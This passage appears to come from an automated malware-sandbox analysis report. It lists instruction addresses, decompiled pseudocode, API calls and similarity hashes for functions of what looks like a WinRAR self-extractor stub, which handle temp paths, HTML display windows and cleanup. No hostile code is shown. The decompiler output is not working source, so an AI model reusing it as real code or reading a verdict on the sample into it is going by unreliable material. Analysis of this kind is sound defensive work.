              0x00d8bb88
              0x00d8bb8d
              0x00d8bb8d
              0x00d8bb8d
              0x00d8bba5
              0x00d8bbb2
              0x00d8bbb7
              0x00d8bbb9
              0x00000000
              0x00000000
              0x00d8bb8b
              0x00d8bb8b
              0x00d8bb8b
              0x00d8bb8c
              0x00d8bb8c
              0x00d8bbbb
              0x00d8bbc5
              0x00d8bbcb
              0x00d8bbd3
              0x00d8c093
              0x00d8c093
              0x00d8c093
              0x00d8c098
              0x00d8c09c
              0x00d8c0a0
              0x00d8c0a7
              0x00d8c0ae
              0x00d8c0b1
              0x00d8c0b6
              0x00d8c0b9
              0x00d8c0be
              0x00d8b51d
              0x00d8b523
              0x00d8b529
              0x00d8b529
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d8b53e
              0x00d8b555
              0x00d8b559
              0x00000000
              0x00d8b55b
              0x00000000
              0x00d8b55b
              0x00d8b559
              0x00d8b560
              0x00d8b563
              0x00000000
              0x00000000
              0x00d8b569
              0x00d8b569
              0x00000000
              0x00d8b570
              0x00d8b570
              0x00d8b573
              0x00000000
              0x00000000
              0x00d8b579
              0x00d8b579
              0x00d8b586
              0x00d8b5ac
              0x00d8b5b7
              0x00d8b5c1
              0x00d8b5cc
              0x00d8b5d1
              0x00d8b5d9
              0x00d8b5df
              0x00d8b5e4
              0x00d8b5e6
              0x00d8b74b
              0x00d8b74b
              0x00d8b755
              0x00000000
              0x00d8b5ec
              0x00d8b5f2
              0x00d8b614
              0x00d8b623
              0x00d8b630
              0x00d8b641
              0x00d8b644
              0x00d8b647
              0x00d8b65a
              0x00d8b661
              0x00d8b666
              0x00d8b668
              0x00000000
              0x00000000
              0x00d8b66e
              0x00d8b675
              0x00d8b67a
              0x00d8b67f
              0x00d8b68b
              0x00d8b690
              0x00d8b693
              0x00d8b69a
              0x00d8b69c
              0x00d8b69d
              0x00d8b6a7
              0x00d8b6ad
              0x00d8b6ae
              0x00000000
              0x00d8b6ae
              0x00d8b649
              0x00d8b650
              0x00d8b656
              0x00d8b658
              0x00000000
              0x00000000
              0x00000000
              0x00d8b6b4
              0x00d8b6bb
              0x00d8b6bd
              0x00d8b6c0
              0x00d8b730
              0x00d8b730
              0x00d8b738
              0x00d8b73e
              0x00d8b743
              0x00d8b745
              0x00d8b5f4
              0x00d8b5f9
              0x00d8b601
              0x00d8b607
              0x00d8b60e
              0x00000000
              0x00000000
              0x00000000
              0x00d8b60e
              0x00000000
              0x00d8b745
              0x00d8b6c2
              0x00d8b6c9
              0x00d8b6cf
              0x00d8b6d1
              0x00000000
              0x00d8b6d3
              0x00d8b6d3
              0x00d8b6d5
              0x00d8b6d6
              0x00d8b6da
              0x00d8b6f2
              0x00d8b6f7
              0x00d8b701
              0x00d8b703
              0x00d8b706
              0x00d8b6d8
              0x00d8b6d8
              0x00d8b6d9
              0x00000000
              0x00d8b708
              0x00d8b716
              0x00d8b71c
              0x00d8b71e
              0x00d8b72a
              0x00d8b72a
              0x00000000
              0x00d8b71e
              0x00d8b706
              0x00d8b6d1
              0x00000000
              0x00d8b75f
              0x00d8b75f
              0x00d8b761
              0x00d8b767
              0x00d8b76c
              0x00d8b76e
              0x00d8b771
              0x00d8b773
              0x00d8b780
              0x00d8b785
              0x00d8b786
              0x00d8b786
              0x00d8b787
              0x00d8b787
              0x00d8b78a
              0x00d8b78c
              0x00d8b796
              0x00d8b799
              0x00d8b79f
              0x00d8b7a1
              0x00d8b78e
              0x00d8b78e
              0x00d8b78e
              0x00d8b7a6
              0x00d8b7a8
              0x00d8b7b1
              0x00d8b7b1
              0x00d8b7b3
              0x00d8b7b4
              0x00d8b7b9
              0x00d8b7c2
              0x00d8b7c3
              0x00d8b7c9
              0x00d8b7ce
              0x00d8b7d1
              0x00d8b7d3
              0x00d8b7d5
              0x00d8b7da
              0x00d8b7dc
              0x00d8b7de
              0x00d8b7de
              0x00d8b7e0
              0x00d8b7e0
              0x00d8b7e5
              0x00d8b7ea
              0x00d8b7eb
              0x00d8b7eb
              0x00d8b7ec
              0x00d8b7ee
              0x00d8b7f5
              0x00d8b7fa
              0x00d8b7ee
              0x00000000
              0x00000000
              0x00d8b800
              0x00d8b800
              0x00d8b802
              0x00d8b812
              0x00d8b812
              0x00000000
              0x00000000
              0x00d8b81d
              0x00d8b81d
              0x00d8b81f
              0x00000000
              0x00000000
              0x00d8b825
              0x00d8b825
              0x00d8b82c
              0x00000000
              0x00000000
              0x00d8b832
              0x00d8b832
              0x00d8b834
              0x00d8b83a
              0x00d8b83c
              0x00d8b843
              0x00d8b844
              0x00d8b84b
              0x00d8b84d
              0x00d8b84d
              0x00d8b854
              0x00d8b859
              0x00d8b85f
              0x00d8b861
              0x00000000
              0x00d8b867
              0x00d8b867
              0x00d8b867
              0x00d8b86a
              0x00d8b86c
              0x00d8b86d
              0x00d8b870
              0x00d8b899
              0x00d8b899
              0x00d8b89c
              0x00d8b981
              0x00d8b98a
              0x00d8b98f
              0x00d8b98f
              0x00d8b991
              0x00d8b991
              0x00d8b993
              0x00d8b995
              0x00d8b99c
              0x00d8b9a1
              0x00d8b9a2
              0x00d8b9a3
              0x00d8b9a5
              0x00d8b9a7
              0x00d8b9ab
              0x00d8b9ad
              0x00d8b9ad
              0x00d8b9af
              0x00d8b9af
              0x00d8b9ab
              0x00d8b9b3
              0x00d8b9b9
              0x00d8b9c6
              0x00d8b9cd
              0x00d8b9dd
              0x00d8b9e7
              0x00d8b9ef
              0x00d8b9fb
              0x00d8b9fd
              0x00d8ba05
              0x00d8ba0a
              0x00d8ba0b
              0x00d8ba0c
              0x00d8ba0e
              0x00d8ba1b
              0x00d8ba24
              0x00d8ba24
              0x00000000
              0x00d8ba0e
              0x00d8b8a2
              0x00d8b8a2
              0x00d8b8a5
              0x00d8b8b2
              0x00d8b8b2
              0x00d8b8b5
              0x00d8b8b7
              0x00d8b8b8
              0x00d8b8ba
              0x00d8b8bb
              0x00d8b8c0
              0x00d8b8c5
              0x00d8b8cb
              0x00d8b8cd
              0x00d8b8cf
              0x00d8b8d2
              0x00d8b8d9
              0x00d8b8da
              0x00d8b8e0
              0x00d8b8e1
              0x00d8b8e4
              0x00d8b8e5
              0x00d8b8e6
              0x00d8b8eb
              0x00d8b8ee
              0x00d8b8f4
              0x00d8b8fd
              0x00d8b900
              0x00d8b905
              0x00d8b907
              0x00d8b909
              0x00d8b90b
              0x00d8b90b
              0x00d8b90d
              0x00d8b90d
              0x00d8b90f
              0x00d8b90f
              0x00d8b917
              0x00d8b91e
              0x00d8b920
              0x00d8b927
              0x00d8b92d
              0x00d8b92f
              0x00d8b930
              0x00d8b938
              0x00d8b947
              0x00d8b947
              0x00d8b938
              0x00d8b952
              0x00d8b954
              0x00d8b963
              0x00d8b969
              0x00d8b96f
              0x00d8b97a
              0x00d8b97a
              0x00000000
              0x00d8b96f
              0x00d8b8a7
              0x00d8b8a7
              0x00d8b8ac
              0x00000000
              0x00000000
              0x00000000
              0x00d8b8ac
              0x00d8b872
              0x00d8b872
              0x00d8b876
              0x00000000
              0x00000000
              0x00d8b878
              0x00d8b878
              0x00d8b87b
              0x00d8b87d
              0x00d8b880
              0x00000000
              0x00000000
              0x00d8b886
              0x00d8b88f
              0x00000000
              0x00d8b88f
              0x00000000
              0x00d8ba2b
              0x00d8ba2b
              0x00d8ba2c
              0x00d8ba31
              0x00d8ba33
              0x00d8ba36
              0x00d8ba36
              0x00000000
              0x00d8ba6c
              0x00d8ba6c
              0x00d8ba73
              0x00d8ba75
              0x00d8ba75
              0x00d8ba77
              0x00d8baa6
              0x00d8baa6
              0x00d8baac
              0x00000000
              0x00d8baac
              0x00d8ba79
              0x00d8ba79
              0x00d8ba79
              0x00d8ba7c
              0x00d8ba95
              0x00d8ba95
              0x00d8ba9b
              0x00d8ba9b
              0x00000000
              0x00d8ba9b
              0x00d8ba7e
              0x00d8ba7e
              0x00d8ba7e
              0x00d8ba81
              0x00000000
              0x00000000
              0x00d8ba83
              0x00d8ba83
              0x00d8ba83
              0x00d8ba86
              0x00000000
              0x00000000
              0x00d8ba8c
              0x00d8ba8c
              0x00000000
              0x00000000
              0x00d8baf9
              0x00d8baf9
              0x00d8bafc
              0x00000000
              0x00000000
              0x00d8bafe
              0x00d8bafe
              0x00d8bb0a
              0x00d8bb0f
              0x00d8bb10
              0x00d8bb11
              0x00d8bb13
              0x00000000
              0x00000000
              0x00d8bb15
              0x00d8bb15
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d8bd07
              0x00d8bd07
              0x00d8bd0a
              0x00d8bd0c
              0x00d8bd13
              0x00d8bd15
              0x00d8bd1b
              0x00d8bd1c
              0x00d8bd21
              0x00d8bd22
              0x00d8bd22
              0x00d8bd27
              0x00d8bd2a
              0x00d8bd30
              0x00d8bd30
              0x00d8bd35
              0x00000000
              0x00000000
              0x00d8bd41
              0x00d8bd41
              0x00d8bd44
              0x00d8bb25
              0x00d8bb25
              0x00000000
              0x00d8bb25
              0x00d8bd4a
              0x00d8bd4a
              0x00d8bb16
              0x00d8bb16
              0x00d8bb1c
              0x00d8bb1d
              0x00d8bb20
              0x00000000
              0x00000000
              0x00d8bd51
              0x00d8bd51
              0x00d8bd54
              0x00000000
              0x00000000
              0x00d8bd5a
              0x00d8bd5a
              0x00d8bd5c
              0x00d8bd63
              0x00d8bd6b
              0x00d8bd71
              0x00d8bd76
              0x00d8bd79
              0x00d8bdae
              0x00d8bdb3
              0x00d8bdb9
              0x00d8bdba
              0x00d8bdbf
              0x00d8bd7b
              0x00d8bd7b
              0x00d8bd7e
              0x00d8bd84
              0x00d8bd9a
              0x00d8bd9f
              0x00d8bda0
              0x00d8bda5
              0x00d8bd86
              0x00d8bd86
              0x00d8bd8b
              0x00d8bd8c
              0x00d8bd91
              0x00d8bd91
              0x00d8bd84
              0x00d8bdc6
              0x00d8bdc8
              0x00d8bdcf
              0x00d8bddd
              0x00d8bde4
              0x00d8bde9
              0x00d8bdea
              0x00d8bdeb
              0x00d8bded
              0x00d8bdee
              0x00d8bdf5
              0x00d8be3e
              0x00d8be45
              0x00d8be4a
              0x00d8be4c
              0x00000000
              0x00000000
              0x00d8be52
              0x00d8be52
              0x00d8be54
              0x00d8be5a
              0x00d8be61
              0x00000000
              0x00000000
              0x00d8be63
              0x00d8be63
              0x00d8be65
              0x00d8be66
              0x00d8be66
              0x00d8be66
              0x00d8be69
              0x00d8be6c
              0x00d8be76
              0x00d8be76
              0x00d8be78
              0x00d8be7a
              0x00d8be84
              0x00d8be89
              0x00d8be8b
              0x00d8bec9
              0x00d8bec9
              0x00d8becc
              0x00d8becc
              0x00d8bece
              0x00d8becf
              0x00d8becf
              0x00000000
              0x00d8becf
              0x00d8be8d
              0x00d8be8d
              0x00d8be8f
              0x00d8be90
              0x00d8be92
              0x00d8be95
              0x00d8beaa
              0x00d8beaa
              0x00d8beac
              0x00d8bead
              0x00d8bead
              0x00d8bead
              0x00d8beb0
              0x00d8beb0
              0x00d8beb5
              0x00d8beb6
              0x00d8bebc
              0x00d8bebc
              0x00d8bebd
              0x00d8bec2
              0x00d8bec3
              0x00d8bec4
              0x00000000
              0x00d8bec4
              0x00d8be97
              0x00d8be97
              0x00d8be9e
              0x00d8bea1
              0x00d8bea2
              0x00000000
              0x00d8bea2
              0x00d8be6e
              0x00d8be6e
              0x00d8be70
              0x00d8be71
              0x00d8be74
              0x00000000
              0x00000000
              0x00000000
              0x00d8bed1
              0x00d8bed1
              0x00d8bed4
              0x00d8bed4
              0x00d8bed9
              0x00d8bedb
              0x00d8bedd
              0x00d8bedd
              0x00d8bedf
              0x00d8bedf
              0x00000000
              0x00d8bdf7
              0x00d8bdf7
              0x00d8bdfe
              0x00d8be0a
              0x00d8be10
              0x00d8be11
              0x00d8be12
              0x00d8be17
              0x00d8be1a
              0x00d8be1c
              0x00d8be22
              0x00d8be24
              0x00d8be32
              0x00d8be37
              0x00d8be38
              0x00d8be38
              0x00d8bee2
              0x00d8bee2
              0x00d8beea
              0x00d8beef
              0x00d8bef1
              0x00d8bef2
              0x00d8bef8
              0x00d8bef9
              0x00d8beff
              0x00d8bf00
              0x00d8bf00
              0x00d8bf05
              0x00d8bf06
              0x00d8bf0c
              0x00d8bf0d
              0x00d8bf13
              0x00d8bf14
              0x00d8bf19
              0x00d8bf21
              0x00d8bf2d
              0x00d8bf2d
              0x00d8bf3a
              0x00d8bf3f
              0x00d8bf47
              0x00d8bf51
              0x00d8bf5e
              0x00d8bf65
              0x00d8bf65
              0x00d8bf71
              0x00d8bf78
              0x00d8bf7d
              0x00d8bf85
              0x00d8bf8b
              0x00d8bf8c
              0x00d8bf8d
              0x00d8bf8f
              0x00d8bf8f
              0x00d8bfa4
              0x00d8bfa9
              0x00d8bfb5
              0x00d8bfb7
              0x00d8bfc8
              0x00d8bfd5
              0x00000000
              0x00d8bfb9
              0x00d8bfb9
              0x00d8bfc4
              0x00d8bfc6
              0x00d8bfda
              0x00d8bfda
              0x00d8bfdc
              0x00d8bfe2
              0x00d8bfe8
              0x00d8bff6
              0x00d8bffb
              0x00d8bffc
              0x00d8c004
              0x00d8c009
              0x00d8c010
              0x00d8c016
              0x00d8c018
              0x00d8c01e
              0x00d8c024
              0x00d8c026
              0x00d8c02f
              0x00d8c032
              0x00d8c034
              0x00d8c03d
              0x00d8c040
              0x00d8c046
              0x00d8c049
              0x00d8c052
              0x00d8c061
              0x00d8c066
              0x00d8c06e
              0x00d8c070
              0x00d8c071
              0x00d8c077
              0x00d8c078
              0x00d8c07a
              0x00d8c07f
              0x00d8c07f
              0x00000000
              0x00d8c06e
              0x00000000
              0x00d8bfc6
              0x00d8bfb7
              0x00000000
              0x00d8c087
              0x00d8c087
              0x00d8c08a
              0x00d8c08c
              0x00d8c08c
              0x00000000
              0x00000000
              0x00d8bab8
              0x00d8bab8
              0x00d8bac0
              0x00d8bac6
              0x00d8bac9
              0x00d8baed
              0x00d8bacb
              0x00d8bacb
              0x00d8bace
              0x00d8bae1
              0x00d8bad0
              0x00d8bad0
              0x00d8bad2
              0x00d8bad7
              0x00d8bad7
              0x00d8bace
              0x00000000
              0x00000000
              0x00d8bb31
              0x00d8bb31
              0x00d8bb32
              0x00d8bb37
              0x00d8bb37
              0x00d8bb37
              0x00d8bb3a
              0x00d8bb3f
              0x00d8bb45
              0x00d8bb45
              0x00d8bb4b
              0x00d8bb51
              0x00d8bb51
              0x00000000
              0x00000000
              0x00d8b52a
              0x00d8b52c
              0x00d8b531
              0x00d8b537
              0x00d8b53a
              0x00000000
              0x00d8b53c
              0x00d8b53c
              0x00000000
              0x00d8b53c
              0x00d8b53a
              0x00d8c0c4
              0x00d8c0ca
              0x00d8c0d4
              0x00d8c0d4
              0x00d8bbd9
              0x00d8bbd9
              0x00d8bbe0
              0x00000000
              0x00000000
              0x00d8bbe6
              0x00d8bbe6
              0x00d8bbe8
              0x00d8bbef
              0x00d8bbf7
              0x00d8bbf8
              0x00d8bbfd
              0x00d8bbfe
              0x00d8bbff
              0x00d8bc01
              0x00d8bc55
              0x00d8bc55
              0x00d8bc5d
              0x00d8bc6b
              0x00d8bc7c
              0x00d8bc8a
              0x00d8bc8a
              0x00d8bc96
              0x00d8bc9b
              0x00d8bc9d
              0x00d8bcad
              0x00d8bcb7
              0x00d8bcbc
              0x00d8bcbf
              0x00000000
              0x00d8bcc5
              0x00d8bcc5
              0x00d8bcca
              0x00d8bcca
              0x00d8bccc
              0x00d8bcd3
              0x00d8bcd9
              0x00000000
              0x00d8bcd9
              0x00d8bcbf
              0x00d8bc03
              0x00d8bc05
              0x00d8bc07
              0x00d8bc0e
              0x00000000
              0x00000000
              0x00d8bc10
              0x00d8bc10
              0x00d8bc12
              0x00d8bc18
              0x00d8bc18
              0x00d8bc18
              0x00d8bc1c
              0x00000000
              0x00000000
              0x00d8bc1e
              0x00d8bc1e
              0x00d8bc1f
              0x00d8bc25
              0x00d8bc28
              0x00d8bc2a
              0x00d8bc2d
              0x00000000
              0x00000000
              0x00d8bc2f
              0x00000000
              0x00d8bc2f
              0x00d8bc31
              0x00d8bc3c
              0x00d8bc46
              0x00d8bc4b
              0x00d8bc4b
              0x00d8bc4d
              0x00000000
              0x00d8bcdf
              0x00d8bcdf
              0x00d8bce2
              0x00d8bce8
              0x00d8bcef
              0x00d8bcf1
              0x00d8bcf1
              0x00d8bcfb
              0x00d8bcfb
              0x00000000
              0x00d8bce2

              APIs
              • GetTempPathW.KERNEL32(00000800,?), ref: 00D8BB71
              • _swprintf.LIBCMT ref: 00D8BBA5
                • Part of subcall function 00D73E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73E54
              • SetDlgItemTextW.USER32(?,00000066,00DB85FA), ref: 00D8BBC5
              • _wcschr.LIBVCRUNTIME ref: 00D8BBF8
              • EndDialog.USER32(?,00000001), ref: 00D8BCD9
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
              • String ID: %s%s%u
              • API String ID: 2892007947-1360425832
              • Opcode ID: 77cb1394b9d0da3bf9b2c4c0b4c893db32162f0e188155755e4343f1a2459c76
              • Instruction ID: 4342b9f8fa4c004159a8502fd698711ad820986ffd867d419ad744f585a26e34
              • Opcode Fuzzy Hash: 77cb1394b9d0da3bf9b2c4c0b4c893db32162f0e188155755e4343f1a2459c76
              • Instruction Fuzzy Hash: CD412872900659EEEF25AB74CC85EEE77BCEB04314F0441A6E50AE6151EF709A888F71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D888BF, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 124memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E00D888BF(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t67;
				long _t69;
				void* _t71;
				void* _t72;

				_t58 = __edx;
				_t43 = _t44;
				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t71 + 0x18));
				 *((char*)(_t71 + 0x1c)) = E00D887A5(_t60);
				_push(0x200 + E00D92B33(_t60) * 2);
				_t24 = E00D92B53(_t44);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00D94D7E(_t64, L"<html>");
				E00D966ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00D966ED(_t64, L"utf-8\"></head>");
				_t72 = _t71 + 0x18;
				_t67 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E00D81432(_t76, _t67, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
					if(_t31 != 0) {
						_t60 = _t67 + 0xc;
					}
					E00D966ED(_t64, _t60);
					if( *((char*)(_t72 + 0x1c)) == 0) {
						E00D966ED(_t64, L"</html>");
					}
					_t79 =  *((char*)(_t72 + 0x1c));
					if( *((char*)(_t72 + 0x1c)) == 0) {
						_push(_t64);
						_t64 = E00D88ACA(_t58, _t79);
					}
					_t69 = 9 + E00D92B33(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t69);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00D92B4E(_t64);
					_t24 =  *0xdadff8(_t62, 1, _t72 + 0x10);
					if(_t24 >= 0) {
						E00D887DC( *((intOrPtr*)(_t43 + 0x10)));
						_t38 =  *((intOrPtr*)(_t72 + 0xc));
						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t67 = _t67 + 2;
					_t76 =  *_t67 - _t28;
				} while ( *_t67 == _t28);
				goto L4;
			}



















              0x00d888bf
              0x00d888c2
              0x00d888c8
              0x00d88a04
              0x00d88a04
              0x00d888ce
              0x00d888d5
              0x00d888e0
              0x00d888f0
              0x00d888f1
              0x00d888f6
              0x00d888fc
              0x00d889ff
              0x00000000
              0x00d88a00
              0x00d88909
              0x00d88914
              0x00d8891f
              0x00d88924
              0x00d88927
              0x00d8892b
              0x00d8892f
              0x00d8893a
              0x00d88942
              0x00d88949
              0x00d8894b
              0x00d8894d
              0x00d88951
              0x00d88953
              0x00d88953
              0x00d88958
              0x00d88964
              0x00d8896c
              0x00d88972
              0x00d88973
              0x00d88978
              0x00d8897a
              0x00d88982
              0x00d88982
              0x00d8898e
              0x00d8899a
              0x00d8899e
              0x00d889a8
              0x00d889bd
              0x00d889ca
              0x00d889bf
              0x00d889bf
              0x00d889c4
              0x00d889c4
              0x00d889bd
              0x00d889ce
              0x00d889dc
              0x00d889e5
              0x00d889f0
              0x00d889f5
              0x00d889fc
              0x00d889fc
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d88931
              0x00d88931
              0x00d88931
              0x00d88934
              0x00d88934
              0x00000000

              APIs
              • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D887A0), ref: 00D88994
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D889B5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AllocByteCharGlobalMultiWide
              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
              • API String ID: 3286310052-4209811716
              • Opcode ID: 11ec47b64307e2b3a06605cb3140b6dccb5fbf678e10d3997ebf72971e596799
              • Instruction ID: 005866cd8142ffd9545cecdf83980d901b26f69f53fd702a0942862b00f54f85
              • Opcode Fuzzy Hash: 11ec47b64307e2b3a06605cb3140b6dccb5fbf678e10d3997ebf72971e596799
              • Instruction Fuzzy Hash: 03310132104302BEE715BB60DC06FBBB7A9DF42720F14850AF411961C2EF70A9098BBA
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D88FE6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
              Download Yara Rule
              C-Code - Quality: 43%
              			E00D88FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00D88D3F(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L00D92B4E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E00D9668C(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0xdadf88(0,  *0xdadfd4(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0xdadf90( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0xdadf98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xdadfd4(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0xdadf8c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E00D88E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L00D92B4E(_t65);
							}
						}
					}
				}
				return _t43;
			}














              0x00d88fef
              0x00d88ff3
              0x00d88ff9
              0x00d88ffc
              0x00d88fff
              0x00d8900b
              0x00d89014
              0x00d89019
              0x00d8901e
              0x00d89024
              0x00d8902a
              0x00d8902e
              0x00d89026
              0x00d89026
              0x00d89026
              0x00d89034
              0x00d8903b
              0x00d89044
              0x00d8905b
              0x00d89065
              0x00d8906a
              0x00d8906a
              0x00d89070
              0x00d8907e
              0x00d890ab
              0x00d890b1
              0x00d890b8
              0x00d890f2
              0x00d890f4
              0x00d890f9
              0x00000000
              0x00d89102
              0x00d890ba
              0x00d890bc
              0x00d890c3
              0x00d890c6
              0x00d890cd
              0x00d890d2
              0x00d890d6
              0x00d890db
              0x00d890e3
              0x00000000
              0x00d890ef
              0x00d890d6
              0x00d890c6
              0x00d890bc
              0x00d8910e

              APIs
              • ShowWindow.USER32(?,00000000), ref: 00D88FFF
              • GetWindowRect.USER32(?,00000000), ref: 00D89044
              • ShowWindow.USER32(?,00000005,00000000), ref: 00D890DB
              • SetWindowTextW.USER32(?,00000000), ref: 00D890E3
              • ShowWindow.USER32(00000000,00000005), ref: 00D890F9
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$Show$RectText
              • String ID: RarHtmlClassName
              • API String ID: 3937224194-1658105358
              • Opcode ID: be051d591920badeec9feb799937d4b1665b3f5c7456ee743ca1c2aa5f0f2fc1
              • Instruction ID: b316b21784b0e98b5db7161ae4fbe9d99e49694c183cfe11cc0a9865dd308771
              • Opcode Fuzzy Hash: be051d591920badeec9feb799937d4b1665b3f5c7456ee743ca1c2aa5f0f2fc1
              • Instruction Fuzzy Hash: 4C319332108350AFCB21AF64DC4CFABBBA9EF49715F084559F98B9A156DB35D800CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9B506, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D9B506(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00D9B4CA(_t45, 7);
					E00D9B4CA(_t45 + 0x1c, 7);
					E00D9B4CA(_t45 + 0x38, 0xc);
					E00D9B4CA(_t45 + 0x68, 0xc);
					E00D9B4CA(_t45 + 0x98, 2);
					E00D97A50( *((intOrPtr*)(_t45 + 0xa0)));
					E00D97A50( *((intOrPtr*)(_t45 + 0xa4)));
					E00D97A50( *((intOrPtr*)(_t45 + 0xa8)));
					E00D9B4CA(_t45 + 0xb4, 7);
					E00D9B4CA(_t45 + 0xd0, 7);
					E00D9B4CA(_t45 + 0xec, 0xc);
					E00D9B4CA(_t45 + 0x11c, 0xc);
					E00D9B4CA(_t45 + 0x14c, 2);
					E00D97A50( *((intOrPtr*)(_t45 + 0x154)));
					E00D97A50( *((intOrPtr*)(_t45 + 0x158)));
					E00D97A50( *((intOrPtr*)(_t45 + 0x15c)));
					return E00D97A50( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




              0x00d9b50c
              0x00d9b511
              0x00d9b51a
              0x00d9b525
              0x00d9b530
              0x00d9b53b
              0x00d9b549
              0x00d9b554
              0x00d9b55f
              0x00d9b56a
              0x00d9b578
              0x00d9b586
